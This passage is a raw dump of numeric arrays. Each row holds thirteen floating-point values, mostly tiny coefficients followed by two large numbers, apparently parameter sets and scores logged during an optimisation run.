-1.1234835849356116e-15, 3.638627899273496e-16,\n 2.4725904181789833e-05, -1.7849753358990938e-06, -\n 1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, \n 3971854766728.4727]]\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, \n 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, \n -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, \n 145011267381.10236]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, 
-1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, \n 138194745977.8172]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, \n 148499957167.59894]\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, \n 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, \n 138376625633.08905]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, \n 147143586736.12967]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06,\n -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, \n 149819556305.94864]\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, \n 5.0376537605765665e-11, -1.7763084077799175e-10, -\n 1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -\n 2.04721003e-06, 
-1.5842532923181598e-08, 9.632771875757591e-10, \n 108694336300.90585, 154375559012.27695]\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, \n 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06,\n -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, \n 195080915978.15582]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13,\n 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15,\n 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, \n 143318140783.98648]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, \n 160453198244.84198]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06,\n -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, \n 109895891048.79645]\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13,\n 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, \n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, \n 122880053749.32047]\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, \n 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, \n -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, \n 
130994741061.18477]\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, \n 148716985588.15564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, \n 101545825010.15762]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15,\n 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, \n 101879284463.33914]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, \n 102270797763.39908]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.7704075824842225e-11, -1.8975666267494283e-10, -\n 1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, \n -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10,\n 166731944707.48343, 109962566902.69849]\n[-2.0926038768787875e-10, -1.3235354562894133e-12, 
-1.9531413192683389e-13,\n 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15,\n 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, \n 111850971687.16727]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15,\n 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, \n 128488226222.4665]\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15,\n 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -\n 1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, \n 172987399752.44284]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, \n 100937635343.36494]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15,\n 
8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, \n 101440046940.62292]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, \n 101522685052.87083]\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, \n 102059630396.96977]\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06,\n -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, \n 102134941196.42899]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, \n 102270797763.3992]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, \n 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n 
-1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, \n 102270797763.39929]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15,\n 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, \n 102518032445.5969]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15,\n 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, \n 102577021916.3392]\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, \n 112061347287.60056]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, \n 136457449593.06062]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, \n 
160562679389.67618]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, \n 101215117638.35565]\n[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, \n 101220474756.55742]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, \n 101440046940.6675]\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 
4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, \n 101479475091.5439]\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, \n 101707557509.25955]\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, \n 101910116331.42278]\n[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13,\n 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, \n 101942928295.47075]\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, \n 104790698646.6004]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8168585276282465e-11, -1.4675478300173032e-10, -\n 1.8210829282495652e-15, 
8.725909439109588e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10,\n 160649925757.17908, 106424978687.80653]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, \n 106648081137.30634]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, \n 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, \n 106784848298.00577]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, \n 106918161793.97298]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, \n 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, \n 117274357359.96004]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, \n 118996909122.33968]\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n 
-1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, \n 125656067768.88814]\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, \n 191438895729.71088]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, \n 99223644222.007]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, \n 100180028793.61896]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, \n 
100223589650.82378]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, \n 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, \n 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, \n 100558408593.70113]\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8877585360256924e-11, -1.4675478300173032e-10, -\n 1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10,\n 193351738763.71564, 100949387586.23102]\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, \n 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, \n 101220474756.86967]\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, \n 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, \n 101440046940.05927]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, \n 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, \n 101467426817.57397]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.8327983670281894e-11, -1.4675478300173032e-10, -\n 1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -\n 1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10,\n 193392923341.53983, 101900620617.14302]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, 
\n 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, \n 103131734300.077]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, \n 103180541968.40872]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, \n 103805616436.34537]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, \n 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, \n 106843736334.12831]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, \n 110030788135.34956]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, \n 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, \n 111006224451.55664]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 
2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, \n 113087422800.04585]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, \n 115101067854.69138]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, \n 126984206927.84627]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, \n 98138013390.26245]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, \n 98829512345.71414]\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, \n 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15,\n 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, \n 98891303611.42876]\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 
176341783374.723, \n 99638222233.03885]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, \n 99962477826.90034]\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, \n 100180028793.6191]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, \n 100290100926.3771]\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, \n 100447140164.3877]\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, \n 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, \n 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, \n 100872818268.9527]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 